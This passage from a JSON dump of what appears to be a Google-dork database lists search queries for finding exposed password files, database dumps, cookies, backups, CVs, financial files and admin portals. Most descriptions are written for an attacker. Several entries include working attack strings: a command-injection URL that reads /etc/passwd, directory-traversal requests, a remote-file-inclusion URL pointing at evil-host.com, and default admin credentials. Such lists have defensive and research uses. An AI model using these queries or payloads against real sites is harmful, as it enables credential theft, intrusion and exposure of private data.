"2004-07-26", "request": "inurl:forum filetype:mdb", "id": 375}, {"short description": "intitle:\"Index Of\" cookies.txt size", "long description": "searches for cookies.txt file. On MANY servers this file holds all cookie information, which may include usernames, passwords, but also gives an attacker some juicy information on this users surfing habits.", "submited": "2004-07-26", "request": "intitle:\"Index Of\" cookies.txt \"size\"", "id": 376}, {"short description": "intext:(password | passcode) intext:(username | userid | user)   filetype:csv", "long description": "CSV formatted files containing all sorts of user/password combinations. Results may vary, but are still interesting to the casual attacker..", "submited": "2004-07-26", "request": "intext:(password | passcode) intext:(username | userid | user)   filetype:csv", "id": 377}, {"short description": "inurl:profiles filetype:mdb", "long description": "Microsoft Access databases containing (user) profiles ..", "submited": "2004-07-26", "request": "inurl:profiles filetype:mdb", "id": 378}, {"short description": "filetype:cgi inurl:\"Web_Store.cgi\"", "long description": "Zero X reported that \"Web_Store.cgi\" allows Command Execution:This application was written by Selena Sol and Gunther Birznieks. You can execute shellcommands:http://[www.victim.com]/cgi-bin/web_store.cgi?page=.html|cat/etc/passwd|It is not know which version and has not (yet) been confirmed by the googledork forum members. That makes this search of limited use, but to an attacker it may be used as a starting point.", "submited": "2004-07-26", "request": "filetype:cgi inurl:\"Web_Store.cgi\"", "id": 379}, {"short description": "ASP.login_aspx \"ASP.NET_SessionId\"", "long description": ".NET based login pages serving the whole environment and process trace for your viewing pleasure.. These are often found on test servers, just before going online to the general public I guess. If the current page has no debugging information any longer, an attacker could still look at Google's cached version.", "submited": "2004-07-26", "request": "ASP.login_aspx \"ASP.NET_SessionId\"", "id": 380}, {"short description": "\"ASP.NET_SessionId\" \"data source=\"", "long description": ".NET pages revealing their datasource and sometimes the authentication credentials with it. The complete debug line looks something like this for example:strConn\tSystem.String Provider=sqloledb;Network Library=DBMSSOCN;Data Source=ch-sql-91;Initial Catalog=DBLive;User Id=login-orsearch;Password=0aX(v5~di)&gt;S$+*For quick fun an attacker could modify this search to find those who use Microsoft Access as their storage:  It will not suprise the experienced security digger that these files are often in a downloadeble location on the server.", "submited": "2004-07-26", "request": "\"ASP.NET_SessionId\" \"data source=\"", "id": 381}, {"short description": "\"Novell, Inc\" WEBACCESS Username Password \"Version *.*\" Copyright  -inurl:help -guides|guide", "long description": "This may be used to find Novell Grouwise Webaccess servers.", "submited": "2004-07-26", "request": "\"Novell, Inc\" WEBACCESS Username Password \"Version *.*\" Copyright  -inurl:help -guides|guide", "id": 382}, {"short description": "\"# -FrontPage-\" ext:pwd inurl:(service | authors | administrators | users) \"# -FrontPage-\" inurl:service.pwd", "long description": "Frontpage.. very nice clean search results listing !!No further comments required..changelog:22 jan 2005: improved by vs1400 !", "submited": "2004-07-26", "request": "ext:pwd inurl:(service | authors | administrators | users) \"# -FrontPage-\"", "id": 383}, {"short description": "filetype:cgi inurl:\"fileman.cgi\"", "long description": "This brings up alot of insecure as well as secure filemanagers. These software solutions are often used by companies offering a \"simple\" but \"cost effective\" way to their users who don't know unix or html. There is a problem sometimes with this specific filemanager due to insecure use of the session ID that can be found in the unprotected \"fileman.log\" logfile. It has been reported that an attacker can abuse the last document-edit-url of the logfile. By copy pasting that line in a new window it gives the attacker valid user credentials on the server, at least for a while.. (think hours not seconds).", "submited": "2004-07-26", "request": "filetype:cgi inurl:\"fileman.cgi\"", "id": 384}, {"short description": "intitle:\"Index Of\" -inurl:maillog  maillog size", "long description": "This google search reveals all maillog files within various directories on a webserver. This search brings back 872 results to-date, all of which contain various chunks of information (ie. Usernames, email adresses, Login/Logout times of users, IPAdresses, directories on the server ect. ect.)Someone, with this information could dig up info on the server before trying to penetrate it by finding usernames, and email adresses of accounts on the server.", "submited": "2004-07-28", "request": "intitle:\"Index Of\" -inurl:maillog  maillog size", "id": 385}, {"short description": "Canon Webview netcams", "long description": "Canon has a series of netcams that all use the \"WebView LiveScope\" software. They are frequently used by japanese sites. Unfortunately most are crawled by their IP address so determining their location becomes more difficult. Some model names are:* VB-C10* VB-101* VB-C50iThis search looks for the java applet called \"LiveApplet\" that is used by Canon's network camera feeds. There is also a standalone (free) program, that is easier to control and lets you save bookmarks. It's available for PC and MACs. The win32 download is here: http://www.x-zone.canon.co.jp/cgi-bin/nph-wvh35-cs.cgi", "submited": "2004-07-29", "request": "intitle:liveapplet inurl:LvAppl", "id": 386}, {"short description": "inurl:\"index.php? module=ew_filemanager\"", "long description": "http://www.cirt.net/advisories/ew_file_manager.shtml:Product: EasyWeb FileManager Module - http://home.postnuke.ru/index.phpDescription: EasyWeb FileManager Module for PostNuke is vulnerable to a directory traversal problem which allows retrieval of arbitrary files from the remote system. Systems Affected: EasyWeb FileManager 1.0 RC-1Technical Description: The PostNuke module works by loading a directory and/or file via the \"pathext\" (directory) and \"view\" (file) variables. Providing a relative path (from the document repository) in the \"pathext\" variable will cause FileManager to provide a directory listing of that diretory. Selecting a file in that listing, or putting a file name in the \"view\" variable, will cause EasyWeb to load the file specified. Only files and directories which can be read by the system user running PHP can be retrieved.Assuming PostNuke is installed at the root level:/etc directory listing:/index.php?module=ew_filemanager&amp;type=admin&amp;func=manager&amp;pathext=../../../etc/etc/passwd file:/index.php?module=ew_filemanager&amp;type=admin&amp;func=manager&amp;pathext=../../../etc/&amp;view=passwdFix/Workaround:Use another file manager module for PostNuke, as the authors do not appear to bemaintaining EW FileManager.Vendor Status: Vendor was contacted but did not respond.Credir: Sullo - cirt.netNOTE: mitigating factor, an attacker needs to be registred and logged on to have access rights to this module.", "submited": "2004-07-29", "request": "inurl:\"index.php?module=ew_filemanager\"", "id": 387}, {"short description": "allinurl:\"index.php\" \"site=sglinks\"", "long description": "Easyins Stadtportal v4 is a German Content Management System for cities and regions. Version 4 and prior seems to be vulnerable to a code inclusion in index.php. Bugtraq: http://www.securityfocus.com/bid/10795http://www.host-vulnerable.com/stadtportal-path/index.php?site=http://www.evil-host.com", "submited": "2004-07-29", "request": "allinurl:\"index.php\" \"site=sglinks\"", "id": 388}, {"short description": "\"powered by\" \"shoutstats\" hourly daily", "long description": "shoutstats is a fast, free Shoutcast server statistic analysis program. It produces instant and dynamic usage reports in HTML format, for viewing in a standard browser. Shoutstats is a bunch of php scripts and a RRDtool database. It has been written under a Debian GNU/Linux.http://www.glop.org/projects/shoutstatsThis search can be used to find Shoutcast servers.", "submited": "2004-07-29", "request": "\"powered by\" \"shoutstats\" hourly daily", "id": 389}, {"short description": "intitle:\"Shoutcast Administrator\"", "long description": "shoutcast is software for streaming mp3 and such. This search finds the administrator page. It can be used to detect unlisted Shoutcast servers.", "submited": "2004-07-29", "request": "intitle:\"Shoutcast Administrator\"", "id": 390}, {"short description": "inurl:\"utilities/TreeView.asp\"", "long description": "From the marketing brochure: \"UltiPro Workforce Management offers you the most comprehensive and cost-effective HR and payroll solution on the market today.\"The default passwords are easy to guess if an employee has not logged into this system. An attacker would only need to find the loginname.", "submited": "2004-07-29", "request": "inurl:\"utilities/TreeView.asp\"", "id": 391}, {"short description": "filetype:pwl pwl", "long description": "These are Windows Password List files and have been known to be easy to crack since the release of Windows 95. An attacker can use the PWLTools to decode them and get the users passwords. The following example has been provided:---Resource table: 0292 0294 0296 0298 (..etc..)File: C:\\Downloads\\2004-07\\07-26\\USER1.PWLUser name: 'USER1'Password: ''Dial-up:'*Rna\\Internet\\PJIU_TAC'Password:'PJIUSCAC3000' ---", "submited": "2004-07-29", "request": "filetype:pwl pwl", "id": 392}, {"short description": "\"apricot - admin\" 00h", "long description": "This search shows the webserver access stats as the user \"admin\". The language used is Japanese and the search includes the \"00h\" value which is only shown when the admin is logged in.", "submited": "2004-07-29", "request": "\"apricot - admin\" 00h", "id": 393}, {"short description": "filetype:ora ora", "long description": "Greetings, The *.ora files are configuration files for oracle clients. An attacker can identify a oracle database this way and get more juicy information by searching for ora config files.This search can be modified to be more specific:- filetype:ora sqlnet - filetype:ora names", "submited": "2004-08-01", "request": "filetype:ora ora", "id": 394}, {"short description": "filetype:wsdl wsdl", "long description": "The XML headers are called *.wsdl files.they can include data, functions or objects. An attacker with knowledge of XML coding can sometimes do evil things with this stuff.", "submited": "2004-08-01", "request": "filetype:wsdl wsdl", "id": 395}, {"short description": "filetype:inc inc intext:setcookie", "long description": "Cookies are often used for authentication and a lot of other stuff.The \"inc\" php header files often include the exact syntax of the cookies. An attacker may create his own cookie with the information he has taken from the header file and start cookie poisining.", "submited": "2004-08-01", "request": "filetype:inc inc intext:setcookie", "id": 396}, {"short description": "inurl:/wwwboard", "long description": "The software wwwboard stores its passwords in a file called \"passwd.txt\".An attacker may try to search forinurl:/wwwboardthen add a \"passwd.txt\" to it (../wwwboard/passwd.txt) and decrypt des DES passwords.", "submited": "2004-08-01", "request": "inurl:/wwwboard", "id": 397}, {"short description": "\"allow_call_time_pass_reference\" \"PATH_INFO\"", "long description": "Returns publically visible pages generated by the php function phpinfo(). This search differs from other phpinfo() searches in that it doesn't depend on the filename being called \"phpinfo.php\". Some result files that include phpinfo are:", "submited": "2004-08-02", "request": "\"allow_call_time_pass_reference\" \"PATH_INFO\"", "id": 398}, {"short description": "inurl:*db filetype:mdb", "long description": "More Microsoft Access databases for your viewing pleasure. Results may vary, but there have been passwords discovered with this search.", "submited": "2004-08-02", "request": "inurl:*db filetype:mdb", "id": 399}, {"short description": "filetype:fp5 fp5 -site:gov -site:mil -\"cvs log\"", "long description": "These are various kinds of FileMaker Pro Databases (*.fp5 applies to both version 5 and 6).", "submited": "2004-08-02", "request": "filetype:fp5 fp5 -site:gov -site:mil -\"cvs log\"", "id": 400}, {"short description": "inurl:gotoURL.asp?url=", "long description": "ASP Nuke is an open-source software application for running a community-based web site on a web server. By open-source, we mean the code is freely available for others to read, modify and use in accordance with the software license. The requirements for the ASP Nuke content management system are: 1. Microsoft SQL Server 2000 and 2. Microsoft Internet Information Server (IIS) 5.0 (http://www.aspnuke.com/)On 30 Dec. 2003 the hackers Cobac and Alnitak discovered a bug in Asp Nuke (version 1.2, 1.3, and 1.4)Problem : the file addurl-inc.asp included in the file gotourl.asp does not sanitize the input vars and make SQL injection possible.For a examples check the original advisory posted to a spanish forum: http://66.102.11.104/search?q=cache:10-ze5DIJ-UJ:www.elhacker.net/foro/index.php%3Ftopic%3D11830.0%3Bprev_next%3Dprev%22&amp;hl=en(link broken in two lines, glue them together first :-)An attacker can obtain the user and admin passwords by crafting a SQL statement.", "submited": "2004-08-03", "request": "inurl:gotoURL.asp?url=", "id": 401}, {"short description": "Phasers 4500/6250/8200/8400", "long description": "More Xerox printers (Phasers 4500/6250/8200/8400). An attacker can access the webinterface with this search.", "submited": "2004-08-05", "request": "intext:centreware inurl:status", "id": 402}, {"short description": "filetype:fp3 fp3", "long description": "These are FileMaker Pro version 3 Databases.", "submited": "2004-08-05", "request": "filetype:fp3 fp3", "id": 403}, {"short description": "filetype:fp7 fp7", "long description": "These are Filemaker Pro version 7 databases files.", "submited": "2004-08-05", "request": "filetype:fp7 fp7", "id": 404}, {"short description": "filetype:cfg auto_inst.cfg", "long description": "Mandrake auto-install configuration files. These contain information about the installed packages, networking setttings and even user accounts.", "submited": "2004-08-05", "request": "filetype:cfg auto_inst.cfg", "id": 405}, {"short description": "intitle:Node.List Win32.Version.3.11", "long description": "synchronet Bulletin Board System Software is a free software package that can turn your personal computer into your own custom online service supporting multiple simultaneous users with hierarchical message and file areas, multi-user chat, and the ever-popular BBS door games.An attacker could use this search to find hosts with telnet access. In some cases the username may even be visible on the node list page, thus leaving only the password to guess.", "submited": "2004-08-05", "request": "intitle:Node.List Win32.Version.3.11", "id": 406}, {"short description": "\"powered by antiboard\"", "long description": "\"AntiBoard is a small and compact multi-threaded bulletin board/message board system written in PHP. It uses either MySQL or PostgreSQL as the database backend, and has support for different languages. It is not meant as the end all be all of bulletin boards, but rather something to easily integrate into your own page.\"There is an excellent vulnerability report at:http://www.securiteam.com/unixfocus/5XP010ADPY.htmlVendor Status:The vendor has been informed of the issues on the 28th July 2004, however no fix is planned in the near future.", "submited": "2004-08-05", "request": "\"powered by antiboard\"", "id": 407}, {"short description": "(inurl:\"ars/cgi-bin/arweb?O=0\" | inurl:arweb.jsp) -site:remedy.com -site:mil", "long description": "From the vendor site: \"Remedys Action Request System is for automating Service Management business processes. More than 7,000 customers know that AR System is the way to automate key business processes. AR System includes tools for application-to-application integration, including support for Web Services that requires no additional programming.\"Login is often 'guest' with no password. Or no login is required. An attacker can search the database for sensitive info (passwords), and search profiles to obtain usernames, emails.", "submited": "2004-08-05", "request": "(inurl:\"ars/cgi-bin/arweb?O=0\" | inurl:arweb.jsp)", "id": 408}, {"short description": "\"AutoCreate=TRUE password=*\"", "long description": "This searches the password for \"Website Access Analyzer\", a Japanese software that creates webstatistics. For those who can read Japanese, check out the author's site at: http://www.coara.or.jp/~passy/Note: google  to find the results of this software.", "submited": "2004-08-05", "request": "\"AutoCreate=TRUE password=*\"", "id": 409}, {"short description": "intext:\"d.aspx?id\" || inurl:\"d.aspx?id\"", "long description": "\"The YouSendIt team was formed to tackle a common problem: secure transmission of large documents online without the use of clumsy client software, mail servers with limited storage space, and sharing passwords. By eliminating the size constraints and security risks of sending files by email, YouSendIt has turned the most common form of communication on the Internet into the best method of secure document transimssion.\"This search shows the files that were transmitted. A malicious user could download them from these pages. This company tends to hold the users responsible for content, while at the same time exposing their pages to Google.. way to go guys..", "submited": "2004-08-05", "request": "intext:\"d.aspx?id\" || inurl:\"d.aspx?id\"", "id": 410}, {"short description": "filetype:pass pass intext:userid", "long description": "Generally, these are dbman password files. They are not cleartext, but still allow an attacker to harvest usernames and optionally crack passwords offline.", "submited": "2004-08-06", "request": "filetype:pass pass intext:userid", "id": 411}, {"short description": "inurl:/cgi-bin/sqwebmail?noframes=1", "long description": "sQWebmail login portals.", "submited": "2004-08-06", "request": "inurl:/cgi-bin/sqwebmail?noframes=1", "id": 412}, {"short description": "filetype:ini ServUDaemon", "long description": "The servU FTP Daemon ini file contains setting and session information including usernames, passwords and more.", "submited": "2004-08-06", "request": "filetype:ini ServUDaemon", "id": 413}, {"short description": "inurl:comersus_message.asp", "long description": "About Comercus: \"Comersus is an active server pages software for running a professional store, seamlessly integrated with the rest of your web site. Comersus Cart is free and it can be used for commercial purposes. Full source code included and compatible with Windows and Linux Servers.\"Comersus Open Technologies Comersus Cart has Multiple Vulnerabilities: http://www.securityfocus.com/bid/10674/info/ This search finds the XSS vulnerable file comersus_message.asp?message= ..No version info is included with the search. Not all results are vulnerable.", "submited": "2004-08-09", "request": "inurl:comersus_message.asp", "id": 414}, {"short description": "intitle:\"teamspeak server-administration", "long description": "TeamSpeak is an application which allows its users to talk to each other over the internet and basically was designed to run in the background of online games. TeamSpeak uses a webadmin login portal to change server settings remotely. Usually not an issue, however it might be when someone lets google pick up their portal.", "submited": "2004-08-09", "request": "intitle:\"teamspeak server-administration", "id": 415}, {"short description": "ext:pl inurl:cgi intitle:\"FormMail *\"  -\"*Referrer\" -\"* Denied\" -sourceforge -error -cvs -input", "long description": "FormMail is a Perl script written by Matt Wright to send mail with sendmail from the cgi-gateway. Early version didn' have a referer check. New versions could be misconfigured. Spammers are known to hunt them down (by means of cgi-scanning) and abuse them for their own evil purposes if the admin forgot to check the settings.http://www.securityfocus.com/bid/3954/discussion/", "submited": "2004-08-09", "request": "ext:pl inurl:cgi intitle:\"FormMail *\"  -\"*Referrer\" -\"* Denied\" -sourceforge -error -cvs -input", "id": 416}, {"short description": "(inurl:\"robot.txt\" | inurl:\"robots.txt\" ) intext:disallow filetype:txt", "long description": "Webmasters wanting to exclude search engine robots from certain parts of their site often choose the use of a robot.txt file on the root of the server. This file basicly tells the bot which directories are supposed to be off-limits.An attacker can easily obtain that information by very simply opening that plain text file in his browser. Webmasters should *never* rely on this for real security issues. Google helps the attacker by allowing a search for the \"disallow\" keyword.", "submited": "2004-08-09", "request": "(inurl:\"robot.txt\" | inurl:\"robots.txt\" ) intext:disallow filetype:txt", "id": 417}, {"short description": "intext:\"Session Start * * * *:*:* *\" filetype:log", "long description": "These are IRC and a few AIM log files. They may contain juicy info or just hours of good clean newbie bashing fun.", "submited": "2004-08-09", "request": "intext:\"Session Start * * * *:*:* *\" filetype:log", "id": 418}, {"short description": "\"WebSTAR Mail - Please Log In\"", "long description": "@stake, Inc. advisory: \"4D WebSTAR is a software product that provides Web, FTP, and Mail services for Mac OS X.  There are numerous vulnerabilities that allow for an attacker to escalate privileges or obtain access to protected resources.\"See also: http://www.securityfocus.com/archive/1/368778", "submited": "2004-08-09", "request": "\"WebSTAR Mail - Please Log In\"", "id": 419}, {"short description": "Ultima Online loginservers", "long description": "This one finds login servers for the Ultima Online game.", "submited": "2004-08-09", "request": "filetype:cfg login \"LoginServer=\"", "id": 420}, {"short description": "inurl:nuke filetype:sql", "long description": "This search reveals database dumps that most likely relate to the php-nuke or postnuke content management systems. These database dumps contain usernames and (sometimes) encrypted passwords for users of the system.", "submited": "2004-08-10", "request": "inurl:nuke filetype:sql", "id": 421}, {"short description": "intitle:\"please login\" \"your password is *\"", "long description": "These administrators were friendly enough to give hints about the password.", "submited": "2004-08-13", "request": "intitle:\"please login\" \"your password is *\"", "id": 422}, {"short description": "mail filetype:csv -site:gov intext:name", "long description": "CSV Exported mail (user) names and such.", "submited": "2004-08-09", "request": "mail filetype:csv -site:gov intext:name", "id": 423}, {"short description": "filetype:xls -site:gov inurl:contact", "long description": "Microsoft Excel sheets containing contact information.", "submited": "2004-08-09", "request": "filetype:xls -site:gov inurl:contact", "id": 424}, {"short description": "intext:\"Warning: * am able * write ** configuration file\" \"includes/configure.php\" -Forums", "long description": "OsCommerce has some security issues, including the following warning message: \"Warning: I am able to write to the configuration file\". Additional information on this can be found at http://www.fluxforums.com/showthread.php?p=14883#post14883With this search an attacker can find vulnerable OsCommerce servers and can build his attack from there.", "submited": "2004-08-13", "request": "intext:\"Warning: * am able * write ** configuration file\" \"includes/configure.php\" -Forums", "id": 425}, {"short description": "inurl:cgi-bin/ultimatebb.cgi?ubb=login", "long description": "These are login pages for Infopop's message board UBB.classic. For the UBB.threads you can use this search This next search finds all UBB pages with the infopop image and a link to the developers.http://www.google.com/search?num=100&amp;&amp;safe=off&amp;q=link%3Ahttp%3A%2F%2Fwww.infopop.com%2Flanding%2Fgoto.php%3Fa%3Dubb.classic&amp;filter=1", "submited": "2004-08-13", "request": "inurl:cgi-bin/ultimatebb.cgi?ubb=login", "id": 426}, {"short description": "inurl:/db/main.mdb", "long description": "ASP-Nuke database file containing passwords.This search goes for the direct location and has few results. For more hits an attacker would try to find ASP-Nuke sites another way (search googledorks for them) and change the URL to the database location.", "submited": "2004-08-13", "request": "inurl:/db/main.mdb", "id": 427}, {"short description": "ext:asp inurl:pathto.asp", "long description": "The UBB trial version contains files that are not safe to keep online after going live. The install files clearly state so:CAUTIONS Do not leave pathto.asp or ubb6_test.cgi on your server. Delete them from the server when you are done. Leaving them in place poses a security risk.\"This searches pathto.asp files and allows an attacker to know the exact installed path of the software.Examples:The path to your Site is -- g:\\0E5\\goldenstateeng.xxx\\webThe path to your Site is -- D:\\inetpub\\wwwroot\\01xx738\\mc10s9izz", "submited": "2004-08-13", "request": "ext:asp inurl:pathto.asp", "id": 428}, {"short description": "ext:cgi inurl:ubb6_test", "long description": "The UBB trial version contains files that are not safe to keep online after going live. The install files clearly state so:CAUTIONS Do not leave pathto.asp or ubb6_test.cgi on your server. Delete them from the server when you are done. Leaving them in place poses a security risk.\"This is the UBB6 Permissions &amp; Paths Diagnostic Script.Example:UBB Version  \t6.1.0.3  Perl Version \t5.006 Server Type \tApache/1.3.27 (Unix) (Red-Hat/Linux) mod_fastcgi/2.2.10 mod_jk/1.2.0 mod_perl/1.24_01 PHP/4.2.2 FrontPage/5.0.2 mod_ssl/2.8.12 OpenSSL/0.9.6b  check path: \t1. \tcheck permission to write new files in this directory2. \tcheck for the 'required' files in both the CGI and this directory3. \tcheck my read/write permissions on all the variables files4. \tcheck my absolute paths in general settings if available  \tversion 2.1 \t2001 Infopop Corporation All Rights Reserved", "submited": "2004-08-13", "request": "ext:cgi inurl:ubb6_test.cgi", "id": 429}, {"short description": "\"this proxy is working fine!\" \"enter *\" \"URL***\" * visit", "long description": "These are test pages for some proxy program. Some have a text field that allows you to use that page as a proxy. The experts comment on this is there are much better solutions for surfing anonymously.", "submited": "2004-08-13", "request": "\"this proxy is working fine!\" \"enter *\" \"URL***\" * visit", "id": 430}, {"short description": "filetype:bak inurl:\"htaccess|passwd|shadow|htusers\"", "long description": "This will search for backup files (*.bak) created by some editors or even by the administrator himself (before activating a new version). Every attacker knows that changing the extenstion of a file on a webserver can have ugly consequences.", "submited": "2004-08-14", "request": "filetype:bak inurl:\"htaccess|passwd|shadow|htusers\"", "id": 431}, {"short description": "\"http://*:*@www\" domainname", "long description": "This is a query to get inline passwords from search engines (not just Google), you must type in the query followed with the the domain name without the .com or .net\"http://*:*@www\" bangbus or \"http://*:*@www\"bangbusAnother way is by just typing\"http://bob:bob@www\"", "submited": "2004-08-14", "request": "\"http://*:*@www\" bob:bob", "id": 432}, {"short description": "filetype:log \"PHP Parse error\" | \"PHP Warning\" | \"PHP Error\"", "long description": "This search will show an attacker some PHP error logs wich may contain information on wich an attack can be based.", "submited": "2004-08-14", "request": "filetype:log \"PHP Parse error\" | \"PHP Warning\" | \"PHP Error\"", "id": 433}, {"short description": "\"powered by CuteNews\" \"2003..2005 CutePHP\"", "long description": "This finds sites powered by various CuteNews versions. An attacker use this list and search the online advisories for vulnerabilities. For example: \"CuteNews HTML Injection Vulnerability Via Commentaries\", Vulnerable Systems: * CuteNews version 1.3.x (http://www.securiteam.com/unixfocus/5BP0N20DFA.html)", "submited": "2004-08-16", "request": "\"powered by CuteNews\" \"2003..2005 CutePHP\"", "id": 434}, {"short description": "intext:\"404 Object Not Found\" Microsoft-IIS/5.0", "long description": "This search finds IIS 5.0 error pages = IIS 5.0 Server", "submited": "2004-08-16", "request": "intext:\"404 Object Not Found\" Microsoft-IIS/5.0", "id": 435}, {"short description": "filetype:conf oekakibbs", "long description": "Oekakibss is a japanese anime creation application. The config file tells an attacker the encrypted password.", "submited": "2004-08-16", "request": "filetype:conf oekakibbs", "id": 436}, {"short description": "Novell NetWare intext:\"netware management portal version\"", "long description": "Netware servers ( v5 and up ) use a web-based management utility called Portal services, which can be used to view files on a volume, view server health statistics, etc. While you must log into the Portal Manager to view any of the data, it will accept blank passwords. So any Netware username defined in the server's NDS database w/o a password can authenticate.After the Google results are displayed, an attacker wil go to the company base web url and learn about employees, preferably their email addresses. Then bounce to the portal management login and try their username w/o a password.", "submited": "2004-08-16", "request": "Novell NetWare intext:\"netware management portal version\"", "id": 437}, {"short description": "Achievo webbased project management", "long description": "Achievo is a free web-based project management tool for business-environments. Achievo's is mainly used for its project management capabilities. According to the site securitytracker.com remote code execution is possible by modifying a certain php script in this software suite. More information is available at: http://www.securitytracker.com/alerts/2002/Aug/1005121.html", "submited": "2004-08-16", "request": "inurl:\"dispatch.php?atknodetype\" |  inurl:class.at", "id": 438}, {"short description": "intitle:\"PHP Explorer\" ext:php (inurl:phpexplorer.php |  inurl:list.php | inurl:browse.php)", "long description": "This searches for PHP Explorer scripts. This looks like a file manager with some nice extra options for an attacker, such as phpinfo, create/list directories and execute command shell. Not many results in this search and some only cached. Over time this may prove to be interesting if Google finds more (or someone finds a better search method for them).", "submited": "2004-08-20", "request": "intitle:\"PHP Explorer\" ext:php (inurl:phpexplorer.php |  inurl:list.php | inurl:browse.php)", "id": 439}, {"short description": "\"ftp://\" \"www.eastgame.net\"", "long description": "Use this search to find eastgame.net ftp servers, loads of warez and that sort of thing.\"thankyou4share\" !", "submited": "2004-08-20", "request": "\"ftp://\" \"www.eastgame.net\"", "id": 440}, {"short description": "intitle:\"ITS System Information\" \"Please log on to the SAP System\"", "long description": "Frontend for SAP Internet Transaction Server webgui service.", "submited": "2004-08-16", "request": "intitle:\"ITS System Information\" \"Please log on to the SAP System\"", "id": 441}, {"short description": "Login (\"Powered by Jetbox One CMS \" | \"Powered by Jetstream *\")", "long description": "Jetbox is a content management systems (CMS) that uses MySQL or equivalent databases. There is a vulnerability report at SF wich I think is overrated, but I will mention here:http://www.securityfocus.com/bid/10858/discussion/The file holding the password is called: \"http://.../includes/general_settings.inc.php\"It does come with default passwords and that is allways a security risk. The administration is available via /admin/Username: admin, Password: admin1 .", "submited": "2004-08-20", "request": "Login (\"Powered by Jetbox One CMS \" | \"Powered by Jetstream *\")", "id": 442}, {"short description": "LeapFTP intitle:\"index.of./\" sites.ini modified", "long description": "The LeapFTP client configuration file \"sites.ini\" holds the login credentials for those sites in plain text. The passwords seems to be encrypted.", "submited": "2004-08-20", "request": "LeapFTP intitle:\"index.of./\" sites.ini modified", "id": 443}, {"short description": "intitle:Login * Webmailer", "long description": "1&amp;1 Webmail login portals. This is made by a german company called Internet United active in the hosting providers area. They have a server login product wich can be found by GooglingThis is all not very exiting as there have been no vulnerabilities reported on this software yet.", "submited": "2004-08-20", "request": "intitle:Login * Webmailer", "id": 444}, {"short description": "inurl:\"gs/adminlogin.aspx\"", "long description": "GradeSpeed seems to be a .NET application to administer school results for several schools using the web. If you do not select a school an error is reported. The HTML source code shows path information, for example: option value=\"E:\\GRADESPEED\\DRHARMONWKELLEYELEMENTARY\\|Dr H. W K. E.|101\"&gt;Dr ...", "submited": "2004-08-20", "request": "inurl:\"gs/adminlogin.aspx\"", "id": 445}, {"short description": "\"phone  * * *\" \"address *\" \"e-mail\" intitle:\"curriculum vitae\"", "long description": "This search gives hounderd of existing curriculum vitae with names and adress. An attacker could steal identity if there is an SSN in the document.", "submited": "2004-08-19", "request": "\"phone  * * *\" \"address *\" \"e-mail\" intitle:\"curriculum vitae\"", "id": 446}, {"short description": "intitle:Novell intitle:WebAccess \"Copyright *-* Novell, Inc\"", "long description": "search to show online Novell Groupwise web access portals.", "submited": "2004-08-21", "request": "intitle:Novell intitle:WebAccess \"Copyright *-* Novell, Inc\"", "id": 447}, {"short description": "intitle:phpMyAdmin \"Welcome to phpMyAdmin ***\" \"running on * as root@*\"", "long description": "search for phpMyAdmin installations that are configured to run the MySQL database with root priviledges.", "submited": "2004-08-21", "request": "intitle:phpMyAdmin \"Welcome to phpMyAdmin ***\" \"running on * as root@*\"", "id": 448}, {"short description": "\"Powered by Gallery v1.4.4\"", "long description": "http://www.securityfocus.com/bid/10968/discussion/\"A vulnerability is reported to exist in Gallery that may allow a remote attacker to execute malicious scripts on a vulnerable system. This issue is a design error that occurs due to the 'set_time_limit' function.The issue presents itself because the 'set_time_limit' function forces the application to wait for 30-seconds before the verification and discarding of non-image files takes place. This allows for a window of opportunity for an attacker to execute a malicious script on a server.Gallery 1.4.4 is reported prone to this issue, however, other versions may be affected as well. \"", "submited": "2004-08-25", "request": "\"Powered by Gallery v1.4.4\"", "id": 449}, {"short description": "Quicken data files", "long description": "The QDATA.QDF file (found sometimes in zipped \"QDATA\" archives online, sometimes not) contains financial data, including banking accounts, credit card numbers, etc. This search has only a couple hits so far, but this should be popular in the coming year as Quicken 2005 makes it very easy and suggests to backup your data online.", "submited": "2004-08-25", "request": "filetype:QDF QDF", "id": 450}, {"short description": "filetype:ini wcx_ftp", "long description": "This searches for Total commander FTP passwords (encrypted) in a file called wcx_ftp.ini. Only 6 hits at the moment, but there may be more in the future.", "submited": "2004-08-25", "request": "filetype:ini wcx_ftp", "id": 451}, {"short description": "4images Administration Control Panel", "long description": "4images Gallery - 4images is a web-based image gallery management system. The 4images administration control panel let you easily modify your galleries.", "submited": "2004-08-25", "request": "\"4images Administration Control Panel\"", "id": 452}, {"short description": "intitle:index.of /AlbumArt_", "long description": "Directories containing commercial music.AlbumArt_{.*}.jpg are download/create by MS-Windows Media Player in music directory.", "submited": "2004-08-26", "request": "intitle:index.of /AlbumArt_", "id": 453}, {"short description": "inurl:robpoll.cgi filetype:cgi", "long description": "robpoll.cgi is used to administrate polls.The default password used for adding polls is 'robpoll'.  All of the results should look something like this: \"http://www.example.com/robpoll.cgi?start\". An attacker may change robpoll.cgi pointing to admin  like this: \"http://www.example.com/robpoll.cgi?admin\".", "submited": "2004-08-30", "request": "inurl:robpoll.cgi filetype:cgi", "id": 454}, {"short description": "( filetype:mail | filetype:eml | filetype:mbox | filetype:mbx ) intext:password|subject", "long description": "storing emails in your webtree isnt a good idea.with this search google will show  files containing emails like mail,eml,mbox or mbx with the keywords\"password\" or \"subject\" in the mail data.", "submited": "2004-08-26", "request": "( filetype:mail | filetype:eml | filetype:mbox | filetype:mbx ) intext:password|subject", "id": 455}, {"short description": "filetype:qbb qbb", "long description": "This search will show QuickBooks Bakup Files. Quickbook is financial accounting software so storing these files in a webtree is not a smart idea.", "submited": "2004-09-06", "request": "filetype:qbb qbb", "id": 456}, {"short description": "filetype:bkf bkf", "long description": "This search will show backupfiles for xp/2000 machines.Of course these files could contain nearly everything, depending on the user selection and they can also be password protected.", "submited": "2004-09-06", "request": "filetype:bkf bkf", "id": 457}, {"short description": "inurl:\"plog/register.php\"", "long description": "pLog is a popular form of bloggin software. Currently there are estimated about 1450 sites running it. The installation documents clearly warn about removing files after installation for security purposes:\"If you are not planning to allow internet users to create new blogs in this server, then you should also remove register.php.\"This search finds that register.php form of course :)Below is some more general information about pLog.Vendor site: hxxp://www.plogworld.org/Admin portals http://sitename/plog/admin.phpInstallation wizard: http://sitename/plog/wizard.phpConfig file (mysql db pass): http://sitename/plog/config/config.properties.phpTemp files: http://sitename/plog/tmp/Gallery files: http://sitename/plog/gallery/Blog search engine: http://www.plogworld.org/ploogle/", "submited": "2004-09-06", "request": "inurl:\"plog/register.php\"", "id": 458}, {"short description": "link:http://www.toastforums.com/", "long description": "Toast Forums is an ASP message board on the Internet. Toast Forums also has all the features of an advanced message board (see hxxp://www.toastforums.com/). The problem 